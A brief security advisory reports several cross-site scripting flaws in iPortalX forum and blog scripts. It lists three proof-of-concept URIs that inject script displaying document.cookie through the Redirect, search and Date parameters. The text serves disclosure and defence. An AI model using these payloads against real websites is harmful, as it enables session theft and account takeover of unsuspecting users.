iPortalX Multiple Cross-Site Scripting Vulnerabilities

iPortalX Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The follow proof-of-concept URIs are available:

http://www.example.com/forum/login_user.asp?Redirect=/forum/search.asp@KW=%22%3E%3 Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.example.com/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E

http://www.example.com/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E